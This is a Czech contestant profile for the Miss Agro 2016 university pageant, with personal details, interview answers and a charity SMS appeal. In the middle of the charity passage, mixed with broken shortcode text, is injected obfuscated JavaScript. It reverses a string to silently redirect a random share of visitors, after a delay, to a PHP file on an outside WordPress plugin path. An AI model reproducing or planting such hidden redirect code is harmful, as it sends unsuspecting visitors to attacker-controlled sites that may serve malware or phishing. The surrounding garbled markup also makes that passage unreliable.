Lucie Janošová

Profil

Fakulta: Institut vzdělání a poradenství (IVP)
Obor: Poradenství v odborném vzdělávání (POV)
Věk: 21 let
Ročník: 1.

Lucka studuje Institut vzdělávání a poradenství, obor Poradenství v odborném vzdělávání. Je jí 21 let a je z Prahy. Miluje cestování a létání. Mluví anglicky a francouzsky. Ráda vaří, peče a zbožňuje jídlo. Baví ji běhání a procházky. Dělala závodně gymnastiku. Má psa a staršího bratra. Jejím životním cílem je mít vlastní rodinu. Ráda by získala titul Miss Agro a bude vděčná za každý Váš hlas!

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ h4=“Pošlete DMS a zařaďte se do slosování o ceny“ css=“.vc_custom_1516548722446{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím organizace Nadání a dovednosti o.p.s. Podpořte je i Vy! Pošlete dárcovskou SMS ve tvaru DMS ROZHLED na číslo 87 777. Cena DMS je 30 Kč. Více na www.darcovskasms.cz. Zasláním DMS do 10. 5. 2016 můžete navíc za Vaši podporu získat odměnu.

Proč by ses zrovna Ty měla stát Miss Agro 2016?
Protože bych byla první Miss Agro z Institutu vzdělávání a poradenství.

Kdyby ses mohla narodit ještě jednou, kdo bys byla?
Byla bych opět sama sebou. Svůj život mám ráda a nechtěla bych ho měnit. Myslím si, že bychom měli být spokojeni s tím, co máme.

Na který předmět na ČZU vzpomínáš nejvíce a proč?
Nejvíce vzpomínám na psychologii. Psychologie je předmět, který mě vždy baví a mohla bych ho mít klidně každý den. Je skvělé si i vyslechnout zajímavé příklady z praxe.